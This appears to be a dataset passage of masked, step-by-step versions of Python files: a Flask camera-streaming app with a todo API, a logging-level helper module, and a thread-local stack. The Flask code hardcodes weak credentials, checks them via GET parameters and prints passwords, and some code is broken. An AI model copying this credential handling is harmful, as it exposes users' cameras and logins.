methods=['GET'])\ndef get_tasks():\n return jsonify({'tasks': tasks})\n\n\n@restAppi.route('/todo/api/v1.0/tasks/<int:task_id>', methods=['GET'])\ndef get_task(task_id):\n task = [task for task in tasks if task['id'] == task_id]\n if len(task) == 0:\n abort(404)\n return jsonify({'task': task[0]})\n\n\n<mask token>\nif __name__ == '__main__':\n threading.Thread(target=restAppi.run(debug=False)).start()\n", "step-3": "<mask token>\ntotal, used, free = shutil.disk_usage('/')\nprint('Total: %d MiB' % (total // 2 ** 20))\nprint('Used: %d MiB' % (used // 2 ** 20))\nprint('Free: %d MiB' % (free // 2 ** 20))\n<mask token>\ndevices = Camera.getDevicesList()\nprint(devices)\ni = 0\nCameras = []\nfor device in devices:\n Cameras.append(Camera(i))\n i = i + 1\ntime.sleep(1)\nprint('Ilość kamer: ' + str(len(Cameras)))\n<mask token>\nLogin = 'kamil'\nPassword = '123'\ntasks = [{'id': 1, 'title': u'Buy groceries', 'description':\n u'Milk, Cheese, Pizza, Fruit, Tylenol', 'done': False}, {'id': 2,\n 'title': u'Learn Python', 'description':\n u'Need to find a good Python tutorial on the web', 'done': False}]\nrestAppi = Flask(__name__)\n\n\ndef gen(task_id):\n while True:\n print('Thread runned ' + str(task_id))\n img = Cameras[task_id].getImg()\n ret, jpeg = cv2.imencode('.jpg', img)\n frame = jpeg.tobytes()\n yield b'--frame\\r\\nContent-Type: image/jpeg\\r\\n\\r\\n' + frame + b'\\r\\n\\r\\n'\n\n\n@restAppi.route('/video_feed/<int:task_id>')\ndef video_feed(task_id):\n return Response(gen(task_id), mimetype=\n 'multipart/x-mixed-replace; boundary=frame')\n\n\n@restAppi.route('/camerasPreview', methods=['GET'])\ndef camerasPreview():\n login = category = request.args.get('login')\n password = content_id = request.args.get('password')\n print(login)\n print(password)\n if login == Login and password == Password:\n return render_template('CamerasPreview.html', name='Kamil',\n camerasCount=len(Cameras))\n else:\n abort(401)\n\n\n@restAppi.route('/')\ndef index():\n return render_template('index.html')\n\n\n@restAppi.route('/todo/api/v1.0/tasks', methods=['GET'])\ndef get_tasks():\n return jsonify({'tasks': tasks})\n\n\n@restAppi.route('/todo/api/v1.0/tasks/<int:task_id>', methods=['GET'])\ndef get_task(task_id):\n task = [task for task in tasks if task['id'] == task_id]\n if len(task) == 0:\n abort(404)\n return jsonify({'task': task[0]})\n\n\nrestAppiRunned = False\nif __name__ == '__main__':\n threading.Thread(target=restAppi.run(debug=False)).start()\n", "step-4": "import shutil\ntotal, used, free = shutil.disk_usage('/')\nprint('Total: %d MiB' % (total // 2 ** 20))\nprint('Used: %d MiB' % (used // 2 ** 20))\nprint('Free: %d MiB' % (free // 2 ** 20))\nfrom Camera import Camera\nimport time\nimport cv2\ndevices = Camera.getDevicesList()\nprint(devices)\ni = 0\nCameras = []\nfor device in devices:\n Cameras.append(Camera(i))\n i = i + 1\ntime.sleep(1)\nprint('Ilość kamer: ' + str(len(Cameras)))\nimport threading\nfrom flask import render_template, Response\nfrom flask import Flask, jsonify\nfrom flask import abort\nfrom flask import request\nLogin = 'kamil'\nPassword = '123'\ntasks = [{'id': 1, 'title': u'Buy groceries', 'description':\n u'Milk, Cheese, Pizza, Fruit, Tylenol', 'done': False}, {'id': 2,\n 'title': u'Learn Python', 'description':\n u'Need to find a good Python tutorial on the web', 'done': False}]\nrestAppi = Flask(__name__)\n\n\ndef gen(task_id):\n while True:\n print('Thread runned ' + str(task_id))\n img = Cameras[task_id].getImg()\n ret, jpeg = cv2.imencode('.jpg', img)\n frame = jpeg.tobytes()\n yield b'--frame\\r\\nContent-Type: image/jpeg\\r\\n\\r\\n' + frame + b'\\r\\n\\r\\n'\n\n\n@restAppi.route('/video_feed/<int:task_id>')\ndef video_feed(task_id):\n return Response(gen(task_id), mimetype=\n 'multipart/x-mixed-replace; boundary=frame')\n\n\n@restAppi.route('/camerasPreview', methods=['GET'])\ndef camerasPreview():\n login = category = request.args.get('login')\n password = content_id = request.args.get('password')\n print(login)\n print(password)\n if login == Login and password == Password:\n return render_template('CamerasPreview.html', name='Kamil',\n camerasCount=len(Cameras))\n else:\n abort(401)\n\n\n@restAppi.route('/')\ndef index():\n return render_template('index.html')\n\n\n@restAppi.route('/todo/api/v1.0/tasks', methods=['GET'])\ndef get_tasks():\n return jsonify({'tasks': tasks})\n\n\n@restAppi.route('/todo/api/v1.0/tasks/<int:task_id>', methods=['GET'])\ndef get_task(task_id):\n task = [task for task in tasks if task['id'] == task_id]\n if len(task) == 0:\n abort(404)\n return jsonify({'task': task[0]})\n\n\nrestAppiRunned = False\nif __name__ == '__main__':\n threading.Thread(target=restAppi.run(debug=False)).start()\n", "step-5": "import shutil\n\ntotal, used, free = shutil.disk_usage(\"/\")\n\nprint(\"Total: %d MiB\" % (total // (2**20)))\nprint(\"Used: %d MiB\" % (used // (2**20)))\nprint(\"Free: %d MiB\" % (free // (2**20)))\n\n\n\nfrom Camera import Camera\nimport time\nimport cv2\n\ndevices = Camera.getDevicesList()\nprint(devices)\n\ni=0\nCameras = []\nfor device in devices:\n Cameras.append(Camera(i))\n i=i+1\ntime.sleep(1)\n\nprint(\"Ilość kamer: \" + str(len(Cameras)))\n\nimport threading\n\n### REST\nfrom flask import render_template, Response\nfrom flask import Flask, jsonify\nfrom flask import abort\nfrom flask import request\n\nLogin = \"kamil\"\nPassword = \"123\"\n\ntasks = [\n {\n 'id': 1,\n 'title': u'Buy groceries',\n 'description': u'Milk, Cheese, Pizza, Fruit, Tylenol',\n 'done': False\n },\n {\n 'id': 2,\n 'title': u'Learn Python',\n 'description': u'Need to find a good Python tutorial on the web',\n 'done': False\n }\n]\n\nrestAppi = Flask(__name__)\ndef gen(task_id):\n while True:\n print(\"Thread runned \" + str(task_id))\n #get camera frame\n img = Cameras[task_id].getImg()\n ret, jpeg = cv2.imencode('.jpg', img)\n frame = jpeg.tobytes()\n yield (b'--frame\\r\\n'\n b'Content-Type: image/jpeg\\r\\n\\r\\n' + frame + b'\\r\\n\\r\\n')\n\n@restAppi.route('/video_feed/<int:task_id>')\ndef video_feed(task_id):\n #print(task_id)\n return Response(gen(task_id),\n mimetype='multipart/x-mixed-replace; boundary=frame')\n\n@restAppi.route('/camerasPreview', methods=['GET'])\ndef camerasPreview():\n login = category = request.args.get('login')\n password = content_id = request.args.get('password')\n print(login)\n print(password)\n if (login == Login) and password == Password:\n return render_template(\"CamerasPreview.html\", name = \"Kamil\", camerasCount = len(Cameras))\n else: abort(401);\n\n@restAppi.route('/')\ndef index():\n return render_template(\"index.html\")\n\n@restAppi.route('/todo/api/v1.0/tasks', methods=['GET'])\ndef get_tasks():\n return jsonify({'tasks': tasks})\n\n@restAppi.route('/todo/api/v1.0/tasks/<int:task_id>', methods=['GET'])\ndef get_task(task_id):\n task = [task for task in tasks if task['id'] == task_id]\n if len(task) == 0:\n abort(404)\n return jsonify({'task': task[0]})\n\nrestAppiRunned = False\nif __name__ == \"__main__\":\n threading.Thread(target=restAppi.run(debug=False)).start()\n\n#if __name__ == '__main__':\n # restAppi.run(debug=False)\n\n", "step-ids": [ 6, 7, 8, 9, 10 ] }
[ 6, 7, 8, 9, 10 ]
# -*- coding: utf-8 -*- from __future__ import print_function, absolute_import, unicode_literals, division __all__ = ['getLevelName', 'getLevel'] #, 'getLevelOrName', '_checkLevel'] import logging # private re-implementations till Python Core fixes Lib/logging # XXX bug numbers here def getLevelName(level, format='%s', no_match=None): # strict={'case': False, 'type': False, 'map': False}, # fixup=False """Return the textual representation of 'level'. Whether predefined (eg. CRITICAL -> "CRITICAL") or user-defined via addLevelName(), the string associated with 'level' is chosen. Otherwise, 'level' (no_match == NONE) or 'no_match' is returned subject to formatting per 'format'. In the spirit of "be liberal in what you accept", any value of 'level' that survives int() will be accepted (FUTURE: subject to 'strict'). Issue #29220 introduced the BAD IDEA that passing an empty string (an obvious TypeError) would return same. This was requested in order to squash the fall-thru behavior of returning "Level %s", when the multi-word response was itself the actual ERROR since it broke all field-based log processing! The astute reader will note that an empty string causes the same pathology... DEPRECATION WARNING: This function WRONGLY returned the mapped Integer if a String form was provided. This violates the clearly stated purpose and forces the caller into defensive Type checks or suffer future TypeErrors. NOTE: Does no bounds or validity checks. Use _checkLevel(). FUTURE: In strict mode, enforce parameter dataType, case, or membership. """ try: # check Name->Level in case called incorrectly (backward compat) if level in logging._nameToLevel: return format % level # retval = _checkLevel(level, flags, fix=T/F) # if isinstance(retval, bool) then handle pass/fail, else update level with fixed value result = logging._levelToName.get(int(level)) if result is not None: return format % result except TypeError: if raiseExceptions: raise("parameter 'level' must reduce to an Integer") except ValueError: pass return format % level if no_match is None else format % no_match def getLevel(levelName, no_match=logging.NOTSET): # strict={'case': False, 'type': False, 'map': False}, # fixup=False """Return the numeric representation of levelName. see getLevelName() for background """ try: result = logging._nameToLevel.get(levelName) if result is not None: return result return int(levelName) except ValueError: if raiseExceptions: raise("parameter 'levelName' must be a defined String") return no_match def getLevelOrName(level): pass def _checkLevel(level, case=False, type=False, map=False): #TODO define check as dictionary pass # """Check parameter against defined values # # Returns corresponding or original Integer, or NOTSET if no-match. # Will raise TypeError or ValueError as applicable. # # NOTE: Since all logging.$level() functions choose to emit based on # numeric comparison, a default of ERROR would be more logical. # """ try: if isinstance(level, str): if not case: level = str.upper(level) rv = _nameToLevel.get(level) # if rv is None: # XXX what now? if isinstance(level, int) or not type: # flip negative values level = int(level) if level in _levelToName(level): rv = level else: # tolerate any Integer value rv = NOTSET if map else level if rv is None: level = str(level) if rv is None: if level in _levelToName or (not type and int(level) in _levelToName): rv = NOTSET if level < NOTSET else level # rv = level if rv is None and map: raise ValueError else: # return parameter even though invalid rv = level # sor level < NOTSET or level > ???: # #raise ValueError # if isinstance(level, int): # XXX check >NOTSET # else: # raise TypeError #FIXME - test harness injects '+1', so tolerating # arbitrary integers is expected behavior. Why? # raise ValueError rv = int(level) except (TypeError, ValueError, KeyError) as err: if raiseExceptions: # test harness (../test/test_logging) expects 'TypeError' ONLY raise TypeError("Level not an integer or a valid string: %r" % level) from err except Exception: pass return NOTSET - 1 if rv is None else rv
normal
{ "blob_id": "ba8b46f830abaaaedf1730cba2f04fd677f11da4", "index": 182, "step-1": "<mask token>\n\n\ndef getLevel(levelName, no_match=logging.NOTSET):\n \"\"\"Return the numeric representation of levelName.\n\n see getLevelName() for background\n \"\"\"\n try:\n result = logging._nameToLevel.get(levelName)\n if result is not None:\n return result\n return int(levelName)\n except ValueError:\n if raiseExceptions:\n raise \"parameter 'levelName' must be a defined String\"\n return no_match\n\n\ndef getLevelOrName(level):\n pass\n\n\n<mask token>\n", "step-2": "<mask token>\n\n\ndef getLevel(levelName, no_match=logging.NOTSET):\n \"\"\"Return the numeric representation of levelName.\n\n see getLevelName() for background\n \"\"\"\n try:\n result = logging._nameToLevel.get(levelName)\n if result is not None:\n return result\n return int(levelName)\n except ValueError:\n if raiseExceptions:\n raise \"parameter 'levelName' must be a defined String\"\n return no_match\n\n\ndef getLevelOrName(level):\n pass\n\n\ndef _checkLevel(level, case=False, type=False, map=False):\n pass\n try:\n if isinstance(level, str):\n if not case:\n level = str.upper(level)\n rv = _nameToLevel.get(level)\n if isinstance(level, int) or not type:\n level = int(level)\n if level in _levelToName(level):\n rv = level\n else:\n rv = NOTSET if map else level\n if rv is None:\n level = str(level)\n if rv is None:\n if level in _levelToName or not type and int(level\n ) in _levelToName:\n rv = NOTSET if level < NOTSET else level\n if rv is None and map:\n raise ValueError\n else:\n rv = level\n rv = int(level)\n except (TypeError, ValueError, KeyError) as err:\n if raiseExceptions:\n raise TypeError('Level not an integer or a valid string: %r' %\n level) from err\n except Exception:\n pass\n return NOTSET - 1 if rv is None else rv\n", "step-3": "<mask token>\n__all__ = ['getLevelName', 'getLevel']\n<mask token>\n\n\ndef getLevelName(level, format='%s', no_match=None):\n \"\"\"Return the textual representation of 'level'.\n\n Whether predefined (eg. CRITICAL -> \"CRITICAL\") or user-defined via\n addLevelName(), the string associated with 'level' is chosen.\n Otherwise, 'level' (no_match == NONE) or 'no_match' is returned\n subject to formatting per 'format'.\n\n In the spirit of \"be liberal in what you accept\", any value of 'level'\n that survives int() will be accepted (FUTURE: subject to 'strict').\n\n Issue #29220 introduced the BAD IDEA that passing an empty string\n (an obvious TypeError) would return same. This was requested in order\n to squash the fall-thru behavior of returning \"Level %s\", when the\n multi-word response was itself the actual ERROR since it broke all\n field-based log processing! The astute reader will note that an empty\n string causes the same pathology...\n\n DEPRECATION WARNING:\n This function WRONGLY returned the mapped Integer if a String form\n was provided. This violates the clearly stated purpose and forces\n the caller into defensive Type checks or suffer future TypeErrors.\n\n NOTE:\n Does no bounds or validity checks. Use _checkLevel().\n\n FUTURE:\n In strict mode, enforce parameter dataType, case, or membership.\n \"\"\"\n try:\n if level in logging._nameToLevel:\n return format % level\n result = logging._levelToName.get(int(level))\n if result is not None:\n return format % result\n except TypeError:\n if raiseExceptions:\n raise \"parameter 'level' must reduce to an Integer\"\n except ValueError:\n pass\n return format % level if no_match is None else format % no_match\n\n\ndef getLevel(levelName, no_match=logging.NOTSET):\n \"\"\"Return the numeric representation of levelName.\n\n see getLevelName() for background\n \"\"\"\n try:\n result = logging._nameToLevel.get(levelName)\n if result is not None:\n return result\n return int(levelName)\n except ValueError:\n if raiseExceptions:\n raise \"parameter 'levelName' must be a defined String\"\n return no_match\n\n\ndef getLevelOrName(level):\n pass\n\n\ndef _checkLevel(level, case=False, type=False, map=False):\n pass\n try:\n if isinstance(level, str):\n if not case:\n level = str.upper(level)\n rv = _nameToLevel.get(level)\n if isinstance(level, int) or not type:\n level = int(level)\n if level in _levelToName(level):\n rv = level\n else:\n rv = NOTSET if map else level\n if rv is None:\n level = str(level)\n if rv is None:\n if level in _levelToName or not type and int(level\n ) in _levelToName:\n rv = NOTSET if level < NOTSET else level\n if rv is None and map:\n raise ValueError\n else:\n rv = level\n rv = int(level)\n except (TypeError, ValueError, KeyError) as err:\n if raiseExceptions:\n raise TypeError('Level not an integer or a valid string: %r' %\n level) from err\n except Exception:\n pass\n return NOTSET - 1 if rv is None else rv\n", "step-4": "from __future__ import print_function, absolute_import, unicode_literals, division\n__all__ = ['getLevelName', 'getLevel']\nimport logging\n\n\ndef getLevelName(level, format='%s', no_match=None):\n \"\"\"Return the textual representation of 'level'.\n\n Whether predefined (eg. CRITICAL -> \"CRITICAL\") or user-defined via\n addLevelName(), the string associated with 'level' is chosen.\n Otherwise, 'level' (no_match == NONE) or 'no_match' is returned\n subject to formatting per 'format'.\n\n In the spirit of \"be liberal in what you accept\", any value of 'level'\n that survives int() will be accepted (FUTURE: subject to 'strict').\n\n Issue #29220 introduced the BAD IDEA that passing an empty string\n (an obvious TypeError) would return same. This was requested in order\n to squash the fall-thru behavior of returning \"Level %s\", when the\n multi-word response was itself the actual ERROR since it broke all\n field-based log processing! The astute reader will note that an empty\n string causes the same pathology...\n\n DEPRECATION WARNING:\n This function WRONGLY returned the mapped Integer if a String form\n was provided. This violates the clearly stated purpose and forces\n the caller into defensive Type checks or suffer future TypeErrors.\n\n NOTE:\n Does no bounds or validity checks. Use _checkLevel().\n\n FUTURE:\n In strict mode, enforce parameter dataType, case, or membership.\n \"\"\"\n try:\n if level in logging._nameToLevel:\n return format % level\n result = logging._levelToName.get(int(level))\n if result is not None:\n return format % result\n except TypeError:\n if raiseExceptions:\n raise \"parameter 'level' must reduce to an Integer\"\n except ValueError:\n pass\n return format % level if no_match is None else format % no_match\n\n\ndef getLevel(levelName, no_match=logging.NOTSET):\n \"\"\"Return the numeric representation of levelName.\n\n see getLevelName() for background\n \"\"\"\n try:\n result = logging._nameToLevel.get(levelName)\n if result is not None:\n return result\n return int(levelName)\n except ValueError:\n if raiseExceptions:\n raise \"parameter 'levelName' must be a defined String\"\n return no_match\n\n\ndef getLevelOrName(level):\n pass\n\n\ndef _checkLevel(level, case=False, type=False, map=False):\n pass\n try:\n if isinstance(level, str):\n if not case:\n level = str.upper(level)\n rv = _nameToLevel.get(level)\n if isinstance(level, int) or not type:\n level = int(level)\n if level in _levelToName(level):\n rv = level\n else:\n rv = NOTSET if map else level\n if rv is None:\n level = str(level)\n if rv is None:\n if level in _levelToName or not type and int(level\n ) in _levelToName:\n rv = NOTSET if level < NOTSET else level\n if rv is None and map:\n raise ValueError\n else:\n rv = level\n rv = int(level)\n except (TypeError, ValueError, KeyError) as err:\n if raiseExceptions:\n raise TypeError('Level not an integer or a valid string: %r' %\n level) from err\n except Exception:\n pass\n return NOTSET - 1 if rv is None else rv\n", "step-5": "# -*- coding: utf-8 -*-\nfrom __future__ import print_function, absolute_import, unicode_literals, division\n\n__all__ = ['getLevelName', 'getLevel'] #, 'getLevelOrName', '_checkLevel']\n\nimport logging\n\n# private re-implementations till Python Core fixes Lib/logging\n# XXX bug numbers here\n\ndef getLevelName(level, format='%s', no_match=None):\n# strict={'case': False, 'type': False, 'map': False},\n# fixup=False\n \"\"\"Return the textual representation of 'level'.\n\n Whether predefined (eg. CRITICAL -> \"CRITICAL\") or user-defined via\n addLevelName(), the string associated with 'level' is chosen.\n Otherwise, 'level' (no_match == NONE) or 'no_match' is returned\n subject to formatting per 'format'.\n\n In the spirit of \"be liberal in what you accept\", any value of 'level'\n that survives int() will be accepted (FUTURE: subject to 'strict').\n\n Issue #29220 introduced the BAD IDEA that passing an empty string\n (an obvious TypeError) would return same. This was requested in order\n to squash the fall-thru behavior of returning \"Level %s\", when the\n multi-word response was itself the actual ERROR since it broke all\n field-based log processing! The astute reader will note that an empty\n string causes the same pathology...\n\n DEPRECATION WARNING:\n This function WRONGLY returned the mapped Integer if a String form\n was provided. This violates the clearly stated purpose and forces\n the caller into defensive Type checks or suffer future TypeErrors.\n\n NOTE:\n Does no bounds or validity checks. Use _checkLevel().\n\n FUTURE:\n In strict mode, enforce parameter dataType, case, or membership.\n \"\"\"\n\n try:\n # check Name->Level in case called incorrectly (backward compat)\n if level in logging._nameToLevel:\n return format % level\n\n # retval = _checkLevel(level, flags, fix=T/F)\n # if isinstance(retval, bool) then handle pass/fail, else update level with fixed value\n\n result = logging._levelToName.get(int(level))\n if result is not None:\n return format % result\n\n except TypeError:\n if raiseExceptions:\n raise(\"parameter 'level' must reduce to an Integer\")\n except ValueError:\n pass\n\n return format % level if no_match is None else format % no_match\n\n\ndef getLevel(levelName, no_match=logging.NOTSET):\n# strict={'case': False, 'type': False, 'map': False},\n# fixup=False\n \"\"\"Return the numeric representation of levelName.\n\n see getLevelName() for background\n \"\"\"\n try:\n result = logging._nameToLevel.get(levelName)\n if result is not None:\n return result\n\n return int(levelName)\n\n except ValueError:\n if raiseExceptions:\n raise(\"parameter 'levelName' must be a defined String\")\n\n return no_match\n\n\ndef getLevelOrName(level):\n pass\n\n\ndef _checkLevel(level, case=False, type=False, map=False):\n #TODO define check as dictionary\n pass\n # \"\"\"Check parameter against defined values\n #\n # Returns corresponding or original Integer, or NOTSET if no-match.\n # Will raise TypeError or ValueError as applicable.\n #\n # NOTE: Since all logging.$level() functions choose to emit based on\n # numeric comparison, a default of ERROR would be more logical.\n # \"\"\"\n try:\n if isinstance(level, str):\n if not case:\n level = str.upper(level)\n rv = _nameToLevel.get(level)\n # if rv is None:\n # XXX what now?\n if isinstance(level, int) or not type:\n # flip negative values\n level = int(level)\n if level in _levelToName(level):\n rv = level\n else:\n # tolerate any Integer value\n rv = NOTSET if map else level\n if rv is None:\n level = str(level)\n if rv is None:\n if level in _levelToName or (not type and int(level) in _levelToName):\n rv = NOTSET if level < NOTSET else level\n # rv = level\n if rv is None and map:\n raise ValueError\n else:\n # return parameter even though invalid\n rv = level\n # sor level < NOTSET or level > ???:\n # #raise ValueError\n # if isinstance(level, int):\n # XXX check >NOTSET\n # else:\n # raise TypeError\n #FIXME - test harness injects '+1', so tolerating\n # arbitrary integers is expected behavior. Why?\n # raise ValueError\n rv = int(level)\n except (TypeError, ValueError, KeyError) as err:\n if raiseExceptions:\n # test harness (../test/test_logging) expects 'TypeError' ONLY\n raise TypeError(\"Level not an integer or a valid string: %r\" % level) from err\n except Exception:\n pass\n\n return NOTSET - 1 if rv is None else rv\n", "step-ids": [ 2, 3, 5, 6, 7 ] }
[ 2, 3, 5, 6, 7 ]
# -*- coding: utf-8 -*- try: from greenlet import getcurrent as get_current_greenlet except ImportError: get_current_greenlet = int from thread import get_ident as get_current_thread from threading import Lock if get_current_greenlet is int: # Use thread get_ident = get_current_thread else: # Use greenlet get_ident = lambda: (get_current_thread(), get_current_greenlet()) class Local(object): __slots__ = ('__data__', '__lock__') def __init__(self): object.__setattr__(self, '__data__', {}) object.__setattr__(self, '__lock__', Lock()) def __iter__(self): return self.__data__.iteritems() def __getattr__(self, item): self.__lock__.acquire() try: try: return self.__data__[get_ident()][item] except KeyError: raise AttributeError(item) finally: self.__lock__.release() def __setattr__(self, key, value): self.__lock__.acquire() try: _id = get_ident() data = self.__data__ if _id in data: data[_id][key] = value else: data[_id] = {key: value} finally: self.__lock__.release() def __delattr__(self, item): self.__lock__.acquire() try: try: del self.__data__[get_ident()][item] except KeyError: raise AttributeError(item) finally: self.__lock__.release() def __release__(self): self.__data__.pop(get_ident(), None) class LocalStack(object): def __init__(self): self._local = Local() self._lock = Lock() def push(self, obj): self._lock.acquire() try: rv = getattr(self._local, 'stack', None) if rv is None: self._local.stack = rv = [] rv.append(obj) return rv finally: self._lock.release() def pop(self): self._lock.acquire() try: stack = getattr(self._local, 'stack', None) if stack is None: return None elif len(stack) == 1: self._local.__release__() return stack[-1] else: stack.pop() finally: self._lock.release() @property def top(self): try: return self._local.stack[-1] except (AttributeError, IndexError): return None
normal
{ "blob_id": "f55b286448f114f3823f099a576af7bec1780a8c", "index": 461, "step-1": "<mask token>\n\n\nclass Local(object):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def __delattr__(self, item):\n self.__lock__.acquire()\n try:\n try:\n del self.__data__[get_ident()][item]\n except KeyError:\n raise AttributeError(item)\n finally:\n self.__lock__.release()\n\n def __release__(self):\n self.__data__.pop(get_ident(), None)\n\n\nclass LocalStack(object):\n\n def __init__(self):\n self._local = Local()\n self._lock = Lock()\n\n def push(self, obj):\n self._lock.acquire()\n try:\n rv = getattr(self._local, 'stack', None)\n if rv is None:\n self._local.stack = rv = []\n rv.append(obj)\n return rv\n finally:\n self._lock.release()\n\n def pop(self):\n self._lock.acquire()\n try:\n stack = getattr(self._local, 'stack', None)\n if stack is None:\n return None\n elif len(stack) == 1:\n self._local.__release__()\n return stack[-1]\n else:\n stack.pop()\n finally:\n self._lock.release()\n\n @property\n def top(self):\n try:\n return self._local.stack[-1]\n except (AttributeError, IndexError):\n return None\n", "step-2": "<mask token>\n\n\nclass Local(object):\n <mask token>\n <mask token>\n\n def __iter__(self):\n return self.__data__.iteritems()\n\n def __getattr__(self, item):\n self.__lock__.acquire()\n try:\n try:\n return self.__data__[get_ident()][item]\n except KeyError:\n raise AttributeError(item)\n finally:\n self.__lock__.release()\n\n def __setattr__(self, key, value):\n self.__lock__.acquire()\n try:\n _id = get_ident()\n data = self.__data__\n if _id in data:\n data[_id][key] = value\n else:\n data[_id] = {key: value}\n finally:\n self.__lock__.release()\n\n def __delattr__(self, item):\n self.__lock__.acquire()\n try:\n try:\n del self.__data__[get_ident()][item]\n except KeyError:\n raise AttributeError(item)\n finally:\n self.__lock__.release()\n\n def __release__(self):\n self.__data__.pop(get_ident(), None)\n\n\nclass LocalStack(object):\n\n def __init__(self):\n self._local = Local()\n self._lock = Lock()\n\n def push(self, obj):\n self._lock.acquire()\n try:\n rv = getattr(self._local, 'stack', None)\n if rv is None:\n self._local.stack = rv = []\n rv.append(obj)\n return rv\n finally:\n self._lock.release()\n\n def pop(self):\n self._lock.acquire()\n try:\n stack = getattr(self._local, 'stack', None)\n if stack is None:\n return None\n elif len(stack) == 1:\n self._local.__release__()\n return stack[-1]\n else:\n stack.pop()\n finally:\n self._lock.release()\n\n @property\n def top(self):\n try:\n return self._local.stack[-1]\n except (AttributeError, IndexError):\n return None\n", "step-3": "<mask token>\n\n\nclass Local(object):\n <mask token>\n\n def __init__(self):\n object.__setattr__(self, '__data__', {})\n object.__setattr__(self, '__lock__', Lock())\n\n def __iter__(self):\n return self.__data__.iteritems()\n\n def __getattr__(self, item):\n self.__lock__.acquire()\n try:\n try:\n return self.__data__[get_ident()][item]\n except KeyError:\n raise AttributeError(item)\n finally:\n self.__lock__.release()\n\n def __setattr__(self, key, value):\n self.__lock__.acquire()\n try:\n _id = get_ident()\n data = self.__data__\n if _id in data:\n data[_id][key] = value\n else:\n data[_id] = {key: value}\n finally:\n self.__lock__.release()\n\n def __delattr__(self, item):\n self.__lock__.acquire()\n try:\n try:\n del self.__data__[get_ident()][item]\n except KeyError:\n raise AttributeError(item)\n finally:\n self.__lock__.release()\n\n def __release__(self):\n self.__data__.pop(get_ident(), None)\n\n\nclass LocalStack(object):\n\n def __init__(self):\n self._local = Local()\n self._lock = Lock()\n\n def push(self, obj):\n self._lock.acquire()\n try:\n rv = getattr(self._local, 'stack', None)\n if rv is None:\n self._local.stack = rv = []\n rv.append(obj)\n return rv\n finally:\n self._lock.release()\n\n def pop(self):\n self._lock.acquire()\n try:\n stack = getattr(self._local, 'stack', None)\n if stack is None:\n return None\n elif len(stack) == 1:\n self._local.__release__()\n return stack[-1]\n else:\n stack.pop()\n finally:\n self._lock.release()\n\n @property\n def top(self):\n try:\n return self._local.stack[-1]\n except (AttributeError, IndexError):\n return None\n", "step-4": "try:\n from greenlet import getcurrent as get_current_greenlet\nexcept ImportError:\n get_current_greenlet = int\nfrom thread import get_ident as get_current_thread\nfrom threading import Lock\nif get_current_greenlet is int:\n get_ident = get_current_thread\nelse:\n get_ident = lambda : (get_current_thread(), get_current_greenlet())\n\n\nclass Local(object):\n __slots__ = '__data__', '__lock__'\n\n def __init__(self):\n object.__setattr__(self, '__data__', {})\n object.__setattr__(self, '__lock__', Lock())\n\n def __iter__(self):\n return self.__data__.iteritems()\n\n def __getattr__(self, item):\n self.__lock__.acquire()\n try:\n try:\n return self.__data__[get_ident()][item]\n except KeyError:\n raise AttributeError(item)\n finally:\n self.__lock__.release()\n\n def __setattr__(self, key, value):\n self.__lock__.acquire()\n try:\n _id = get_ident()\n data = self.__data__\n if _id in data:\n data[_id][key] = value\n else:\n data[_id] = {key: value}\n finally:\n self.__lock__.release()\n\n def __delattr__(self, item):\n self.__lock__.acquire()\n try:\n try:\n del self.__data__[get_ident()][item]\n except KeyError:\n raise AttributeError(item)\n finally:\n self.__lock__.release()\n\n def __release__(self):\n self.__data__.pop(get_ident(), None)\n\n\nclass LocalStack(object):\n\n def __init__(self):\n self._local = Local()\n self._lock = Lock()\n\n def push(self, obj):\n self._lock.acquire()\n try:\n rv = getattr(self._local, 'stack', None)\n if rv is None:\n self._local.stack = rv = []\n rv.append(obj)\n return rv\n finally:\n self._lock.release()\n\n def pop(self):\n self._lock.acquire()\n try:\n stack = getattr(self._local, 'stack', None)\n if stack is None:\n return None\n elif len(stack) == 1:\n self._local.__release__()\n return stack[-1]\n else:\n stack.pop()\n finally:\n self._lock.release()\n\n @property\n def top(self):\n try:\n return self._local.stack[-1]\n except (AttributeError, IndexError):\n return None\n", "step-5": "# -*- coding: utf-8 -*-\ntry:\n from greenlet import getcurrent as get_current_greenlet\nexcept ImportError:\n get_current_greenlet = int\n\nfrom thread import get_ident as get_current_thread\nfrom threading import Lock\n\n\nif get_current_greenlet is int: # Use thread\n get_ident = get_current_thread\nelse: # Use greenlet\n get_ident = lambda: (get_current_thread(), get_current_greenlet())\n\n\nclass Local(object):\n __slots__ = ('__data__', '__lock__')\n\n def __init__(self):\n object.__setattr__(self, '__data__', {})\n object.__setattr__(self, '__lock__', Lock())\n\n def __iter__(self):\n return self.__data__.iteritems()\n\n def __getattr__(self, item):\n self.__lock__.acquire()\n try:\n try:\n return self.__data__[get_ident()][item]\n except KeyError:\n raise AttributeError(item)\n finally:\n self.__lock__.release()\n\n def __setattr__(self, key, value):\n self.__lock__.acquire()\n try:\n _id = get_ident()\n data = self.__data__\n if _id in data:\n data[_id][key] = value\n else:\n data[_id] = {key: value}\n finally:\n self.__lock__.release()\n\n def __delattr__(self, item):\n self.__lock__.acquire()\n try:\n try:\n del self.__data__[get_ident()][item]\n except KeyError:\n raise AttributeError(item)\n finally:\n self.__lock__.release()\n\n def __release__(self):\n self.__data__.pop(get_ident(), None)\n\n\nclass LocalStack(object):\n\n def __init__(self):\n self._local = Local()\n self._lock = Lock()\n\n def push(self, obj):\n self._lock.acquire()\n try:\n rv = getattr(self._local, 'stack', None)\n if rv is None:\n self._local.stack = rv = []\n rv.append(obj)\n return rv\n finally:\n self._lock.release()\n\n def pop(self):\n self._lock.acquire()\n try:\n stack = getattr(self._local, 'stack', None)\n if stack is None:\n return None\n elif len(stack) == 1:\n self._local.__release__()\n return stack[-1]\n else:\n stack.pop()\n finally:\n self._lock.release()\n\n @property\n def top(self):\n try:\n return self._local.stack[-1]\n except (AttributeError, IndexError):\n return None\n", "step-ids": [ 8, 11, 12, 15, 16 ] }
[ 8, 11, 12, 15, 16 ]
